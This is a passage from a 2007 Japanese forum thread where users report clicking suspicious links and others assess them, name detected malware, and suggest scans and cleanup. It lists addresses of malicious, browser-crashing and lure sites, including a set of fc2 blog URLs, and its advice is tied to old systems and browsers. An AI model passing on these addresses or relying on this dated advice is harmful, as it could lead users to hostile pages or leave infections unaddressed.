07/01/28 06:37:57
VSで引っかからなかった奴をシマンテックオンラインスキャンで
やってみた結果です。感染は全てgikonaviのdatファイルでした
ウイルス名はWScript.KakWormが3つとVBS.Freelink.B が1つ
これはもしかして、datファイル内にウイルスコードが残ってるって事?
datファイル消したらおkかしら?
285:名無しさん@お腹いっぱい。
07/01/28 06:44:52
あ、すいません上のなしでw
ググったらわかりますた
286:名無しさん@お腹いっぱい。
07/01/30 19:56:11
これ踏んじゃいました。
URLリンク(smart.45.kg)
AVG Free Edition で2個のファイルが隔離されましたが
その後いきなり再起動がかかりました。
AVGでフルスキャンすると
Boot Sector of Drive C が Changed と表示されました。
一応回復コンソールから fixmbr fixboot をやりました。
他にやっておくべきことはありますでしょうか?
287:名無しさん@お腹いっぱい。
07/01/30 22:14:34
>>286
もう消えてるな…
残っていた時は確か>>267辺りとほぼ同内容だったかな
Update怠ってなければ、この類のものを踏んで深刻な状態になる事は
ほぼ無いと思うが…
とりあえず念の為もう一度スキャンかな
スレリンク(sec板:8番)
288:286
07/01/30 22:28:59
ありがとうございます。そこにあるやつをかけてみます。
289:名無しさん@お腹いっぱい。
07/01/31 01:59:06
URLリンク(www.amadorasweb.com)
これ踏んじゃいました
なんかたくさんページが出てきたんですが大丈夫でしょうか?
290:名無しさん@お腹いっぱい。
07/01/31 02:44:48
>>289
呼び出されるサイトがある程度ランダムなので
確実な事は言えないけど、踏んでみた範囲では
即危険性のあるサイトには当たらなかった
ただどっちにしろまともなサイトだとも思えんので
心配なら適当なウイルススキャンはしておいて損は無いかと
(特に開いたページの、どこかリンクを踏んでしまったとかならなおさらの事)
使用ブラウザがIE6以前なのかな?ポップアップブロックのあるブラウザなら
収拾がつかないって事態にはならなかったと思うけど
291:名無しさん@お腹いっぱい。
07/02/01 02:32:32
URLリンク(up2.viploader.net)
AVG Free7.5.432で何もないって出たんですが、
単にJPG偽装のGIFで、精神的なものだけでしょうか?
292:名無しさん@お腹いっぱい。
07/02/01 03:34:43
普通のサイトに行ってみたらウィンドウが大量に表示続けました。
なんとか止めてウイルススキャンしたんですが何もなし。
で、また同じサイトに行ったんですが今度は普通に見れました。
これってそのサイトがヤバいのかそれとも自分のパソコンがハッキング受けてイタズラされたのでしょうか?
293:名無しさん@お腹いっぱい。
07/02/01 03:42:51
URLリンク(members.jcom.home.ne.jp)
これなんでしょう?そのあとの書き込みにワロタとか書いてあったんですが
ポップアップブロックが働きました。鑑定お願いします。
294:名無しさん@お腹いっぱい。
07/02/01 04:23:06
>>291
ただのgifだね。問題無し
>>292
普通のサイト…って言われても。URLとかの情報が無いと何とも
普通は特定のPCにウィンドウを大量に開くよう仕向ける、なんてハッキングは無いと思うよ
>>293
ネタサイトの一種で、「Windows2010」とでも呼べばいいのかな
「ローディング」が終わった後、ポップアップで開かれるのは
URLリンク(members.jcom.home.ne.jp) になる
古いサイトにはポップアップブロックを考慮していない所もあったり
サイト自体は問題無しかと
295:293
07/02/01 04:30:29
>>294
ネタサイトでしたか・・なんだかレジストリとか出てたので怖かったです。びびりました。
レス来るのを本当に待ってました。ありがとうございます。
キャッシュ消して、ウィルススキャン今やってます。このスレの方には本当に助かってます。
ありがとう。
296:291
07/02/01 11:08:20
>>294
ありがとうございます
衝撃が頭から離れない(^^;;
297:名無しさん@お腹いっぱい。
07/02/03 13:04:27
URLリンク(dailynews.7p.com)
今日、これ踏んでメールとデータが吹っ飛んでしまったんですが、
これってどんな種類の物か分かりますか?
298:名無しさん@お腹いっぱい。
07/02/03 14:01:02
URLリンク(www.110kz.com)
これについてお願いします・・・
299:名無しさん@お腹いっぱい。
07/02/03 19:53:44
>>297
中身はもう消えてる
多分例のごとくニュースサイトのURLに見せかけてウイルスサイトを大量に
引っ張ってくるやつだったとは思うが
>>298
「ページが見つかりません」だった
そのページはもともと無かったか、サイト側で消したのかは分からないが
そこはジョークサイトなのでまぁPCに悪さをするような事は無いはず
300:名無しさん@お腹いっぱい。
07/02/04 02:47:57
URLリンク(www.bestgall.net)
301:名無しさん@お腹いっぱい。
07/02/04 03:40:58
>>295
削除されて今はただのgif
トロイを踏んだ恐れあり
302:名無しさん@お腹いっぱい。
07/02/04 12:58:30
>>293
H"さんのサイトじゃん。
303:名無しさん@お腹いっぱい。
07/02/04 20:59:36
>>301
あのあと、McAfee、カスペルスキー、Ad-Awareでチェックしましたが何も検出されませんでしたよ
すべて、最新の状態に更新してのチェックですが。
304:名無しさん@お腹いっぱい。
07/02/05 16:25:48
URLリンク(resercher.aboutlaw.com)
踏んでしまいました
305:名無しさん@お腹いっぱい。
07/02/05 16:32:00
>>304
FDDアタックとかはともかく、複数のウイルスサイトの呼び出しがある
OSないし使用ブラウザに穴があると感染も有り得る
一時ファイル削除してウイルススキャン
306:名無しさん@お腹いっぱい。
07/02/05 17:18:11
>>305
サンクス
ウイルススキャンしたけど感染ファイルはありませんでした
踏んだ瞬間、パソコンがガタガタいったので怖くなってすぐに閉じました
307:名無しさん@お腹いっぱい。
07/02/05 18:09:06
あとどんなウイルスかよかったら教えてください
308:名無しさん@お腹いっぱい。
07/02/05 18:42:28
どんな、と言われても。とりあえずざっと反応があったのは
「Exploit.HTML.Mht」「Trojan-Downloader.Win32.Obfuscated.n」
「AdTool.Win32.MyWebSearch」「Trojan-Spy.Win32.Banker.cgh」
「VirTool.Win32.VB.af」「Email-Worm.Win32.Lentin.g」
「Trojan-Spy.Win32.Banker.bsh」
こんな所。ワームやらアドウェアやら色々
ただ、exeやscrの直リンクはアンチウイルスは反応するだろうが
ブラウザ越しで踏んでも即実行される訳でも無いから、それほど危ないものでも無い
穴ついて感染を狙う類のやつは面倒なので深く調べてない
そういうものは大抵感染したそばから他のマルウェアを次々と落としてくるだろうから
被害の程度が予測しづらい。おまけに比較的頻繁にソースが変えてくる
現実的には>>304とかを直接踏んで、ド糞重い海外の有害サイト全てがきっちり呼び出されて
感染まで至るかと問われれば…運も絡むのかね
309:名無しさん@お腹いっぱい。
07/02/05 19:08:26
>>308
ありがとうございました
310:名無しさん@お腹いっぱい。
07/02/07 06:35:46
URLリンク(www2.strangeworld.org)
これ踏んじまった
どうなの?
311:名無しさん@お腹いっぱい。
07/02/07 08:10:21
>>310
>>258辺りに出てるから見ておくれ
312:名無しさん@お腹いっぱい。
07/02/08 01:32:44
URLリンク(up2.viploader.net)
踏んでしまった自分が悪いんだけど・・・
すげー頭にきた!!はりつけた奴許せん!
大丈夫なんでしょうか?
313:名無しさん@お腹いっぱい。
07/02/08 04:02:15
>>312
http://のようにもう1つtを削ってくれー
URLリンク(www.trendmicro.co.jp)
とりあえずこのページ見て。オレはこれしかわからん
314:名無しさん@お腹いっぱい。
07/02/08 06:33:25
ありゃ、もう消えちまったか
まぁ大方画像URLに見せかけたブラクラ+ウイルスサイトの呼び出しだろう
>>312
検出されたのが>>313のやつだけなら特に必要な措置は無いんだが…
心配なら一時ファイル削除して適当なウイルススキャン。何も出なければそれでおk
315:312
07/02/08 14:45:36
>>313-314
どうも有り難うございます
一時ファイル削除してウイルススキャンしてみましたが特に異常はありませんでした。
調べて見ましたら、メールの窓が沢山開いたのでもしかしたらMailtoストームというものだったのかも?
.jpgだったんで、てっきり画像だと思ったのが落とし穴でした。
316:名無しさん@お腹いっぱい。
07/02/10 18:36:45
URLリンク(nexx.jp)
これ踏んでしまいました。
当方、XPでNOD32、Zoneを入れております。
どちらも警告はありません。PCの調子も良いです。
何か問題はあるでしょうか?
317:名無しさん@お腹いっぱい。
07/02/10 19:43:00
>>316
crashmeのコピーかな。本家の方は消えたかなり前に消えたんだけども
踏んでもシステム感染とかは無いので、脱出できたのなら特に問題は無いよ
318:名無しさん@お腹いっぱい。
07/02/10 23:56:02
317
ウイルス感染したと思い、オンラインスキャンで調べておりました。
カスペで調べると、Worm.Win32.Antinny.ayに感染したと警告がでました。
調べると、どうやらWinny関連のウイルスのようなので、一安心してましたが・・
(Winnyは使ってないので)
その後感染ファイルを見ると、以前NOD32で検出し、隔離?されていたものに反応していただけのようでした。
念の為、ウイルスバスターのオンラインスキャンで調べてみると、問題なしだったのでほっとしたところです。
>踏んでもシステム感染とかは無いので、脱出できたのなら特に問題は無いよ
そうでしたか!。これで今日はぐっすり眠れます。
レス、有難うございました。
319:名無しさん@お腹いっぱい。
07/02/11 03:04:24
URLリンク(www.coolce.com)
320:名無しさん@お腹いっぱい。
07/02/11 21:17:08
これなんかもちょっとずつ名前変えてあちこちに大量にコピーサイト作り、
キーワード設定して、引っかかる人を待っている悪質なやつだな。
信のブログ
ワープするのだ!
countfuyashi0gokun.blog50.fc2.com/blog-entry-19.html
恒のブログ
ワープするのだ!
noishferry.blog82.fc2.com/blog-entry-11.html
修のブログ
ワープするのだ!
kutanired.blog83.fc2.com
信
ワープするのだ!
sophiawhite.blog76.fc2.com/blog-entry-2.html
諭のブログ
ワープするのだ!
viss12670508.blog88.fc2.com/blog-entry-12.html
勉のブログ
ワープするのだ!
kainkachua.blog68.fc2.com
弁護士恒の日記とブログ
ワープするのだ!
noishferry.blog82.fc2.com/blog-entry-13.html
321:名無しさん@お腹いっぱい。
07/02/13 01:07:56
武板にこんなん貼られてた
178 名前:名無しさん@一本勝ち[sage] 投稿日:2007/02/12(月) 23:54:23 ID:PIMQ1kRw0
URLリンク(www.110kz.com)
こういう技があるんだなぁ~、、
すごすぎる。
322:名無しさん@お腹いっぱい。
07/02/13 05:58:37
既出
323:名無しさん@お腹いっぱい。
07/02/13 14:03:56
URLリンク(dailynews.7h.com)
mac osx10.3
セキリュチイは何もしてませんでした
マックのアイコンがグルグルしたままなので
再起動しました
大丈夫でしょうか
324:名無しさん@お腹いっぱい。
07/02/13 17:45:28
>>323
ページが消えてしまっている上にmacに関しては全くの門外漢なんだ
力になれずすまん
ページ内容が、この所頻出している
ニュースサイトに見せかけたブラクラ+ウイルスサイトだったなら
あれは大概がWindows(IE)前提みたいなものだから
感染はほとんど無いと思うんだが…
それでも心配なら適当なウイルススキャン…だが
mac対応のオンラインスキャンというとシマンテック(ノートン)
くらいしか思いつかん
325:名無しさん@お腹いっぱい。
07/02/13 17:49:49
ありがとっす
あのURLでウイルスとはいやな世の中になったもんだ
326:名無しさん@お腹おっぱい。
07/02/13 19:13:41
ここ潰してやってくださいURLリンク(blog.livedoor.jp)
327:名無しさん@お腹いっぱい。
07/02/13 22:58:37
> 401 名前:名無しさん@恐縮です[] 投稿日:2007/02/13(火) 22:05:38 ID:r4qssjOg0
>
>
> 契約未更改の中日・福留、中村紀入団報道に「真面目に野球やるのがあほらしくなりますね」
> ://newstoday.8m.com/sports/baseball/cd20070213-00000038-chu.html
newstodayと書いてあって今日の日付なので踏んでしまいました
328:名無しさん@お腹いっぱい。
07/02/13 23:46:08
下のURLを踏んでしまいました・・・。
どうすればいいのか教えて下さい!
791 名前:ひよこ名無しさん :2007/02/11(日) 19:29:58 ID:sc0BYyZT
すみませんがお願いします。
URLリンク(sixxx.info)
792 名前: ◆.vDUUxqvlE :2007/02/11(日) 19:42:25 ID:???
>>791
洋エロ系サイトに逝きます
閉じると悪質タイプの偽装インチキセキュリティ系ポップが開きます
AcroRd32.exe が起動しようとするので遮断
Trojan.Clicker.HTML.Agent をClamWinで検出
not-a-virus:Downloader.Win32.WinFixer.m をカスペで検出
PC有害
329:名無しさん@お腹いっぱい。
07/02/13 23:46:51
URLリンク(sixxx.info)
これ踏んでしまいました
ポップが大量に出てパニックです
どうしたらよいでしょうか…
330:名無しさん@お腹いっぱい。
07/02/13 23:48:09
>328
完全にかぶったw
スマン
331:名無しさん@お腹いっぱい。
07/02/14 09:01:53
>>327
すまんがページがもう消えてしまった。踏んだ時に黒い窓が沢山現れたり
勝手にOutlookが立ち上がるとかしたようなら、適当なウイルススキャンを
>>328-329
インチキセキュリティソフトサイトへの誘導が主な狙いの模様で
踏んで即感染、というサイトでは無いと思う
ポップアップで現れたサイトに騙されて何かインスコしてしまった場合は…
WinAntiVirus-詐欺ソフト対策総合スレ-SystemDoctor
スレリンク(sec板)
332:328
07/02/14 11:43:13
>331
トン!
インストールはしませんでした
大丈夫のようですかね、本当にありがとう
333:名無しさん@お腹いっぱい。
07/02/16 22:14:12
URLリンク(headlines.pwac.net)
※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (3)
注意!ループタグを発見! (2)
危険!mailtoストームを発見! (410)
危険!FDDアタックを発見!(7)
危険!無限ループを発見! (2)
危険!ニュースストームを発見! (3)
危険!Telnetストームを発見! (3)
ブラクラチェックが終了しました。
↑な感じだそーですが特に危険ウイルス等はないと判断していいんでしょうか
334:名無しさん@お腹いっぱい。
07/02/17 00:47:38
>>333 なにでしらべたのですか?
335:名無しさん@お腹いっぱい。
07/02/17 07:01:27
>>333
ありゃ、404か。通報食らって消されたかな
SCOの判定部分がそれで本当に全部なら、問題無いが
※ インラインフレームタグを発見しました。
↑こんなの無かったかな?
いつも通りの手口なら、これでウイルスサイトを大量に呼び出すように
仕向けていたようだけど
サイトが生きているうちに踏んじゃったのなら
一応ウイルススキャンを
336:名無しさん@お腹いっぱい。
07/02/19 02:09:12
URLリンク(adserving.cpxinteractive.com)
踏んでしまいました・・・
怪しげなポップアップが出て
その後一応スキャンしても何も出なかったんですけど
337:名無しさん@お腹いっぱい。
07/02/19 03:08:53
日曜日の秘密基地って結構長寿番組だったのか
>>336
ランダム広告かな
懸賞とか儲け話とかの餌で個人情報の収集を図るとか、まぁそんな類の手合いかと思う
何回か確認した限りでは、踏んで即感染とかそういう悪質なのは無かった
開いた窓を地道に閉じていったのなら問題無いかと
338:お願いします
07/02/24 13:53:33
>>316を私も先日踏んでしまいました。
どうすることも出来ずにPCを強制終了しました。
それから数日経ちますが、特にこれといった不具合が出ていないのですが、とても心配しています。
スキャン(PCのシステムツールの中にあるもの)はしましたが、エラーはありませんでした。
PC暦は長いのですが、こういったことには無頓着で初心者です。ご教示下さい。
PCはWindows MEです。
踏んだことで何か懸念されることを教えていただきたいのです。宜しくお願い致します。
339:名無しさん@お腹いっぱい。
07/02/24 16:15:00
>>338
WinMeでも回答としては>>317と同様
強いて言うなら、踏んで終了できなくなったからといって
強制電源断とかやるとHDDに損傷を与える可能性はある
サイト自体は単なる嫌がらせの域を出ない程度のもの
340:338
07/02/24 18:12:56
>>339
ありがとうございます。
そうですか・・ホッとしました。
こういったことは今までのネット生活の中では無縁の経験だったのですが、
2ちゃんをやるようになって、このスレを見てもこういうのが多いということに正直あたふたしております。
強制終了は良くなかったようですね。
ただ、最初は頭が真っ白になって「なになになにぃぃぃい~~!?!?」となってしまい、
なんとか閉じようとしてたのが20秒くらいでしょうか、無理だと悟り、強制終了してしまいました。
>踏んで終了できなくなったからといって強制電源断とかやるとHDDに損傷を与える可能性はある
どうすることが最良でしたでしょうか?無知でお恥ずかしいです。
どういう状態の画面が出てきたか今でも覚えていますが、本当に気持ち悪くて、本当にやめて欲しいです・・
でも、序の口で私の言ってることは笑われてしまうようなことでしたらお恥ずかしいですm(__)mすみません。
(踏んだ自分が悪いのですが。今後充分に気をつけます。)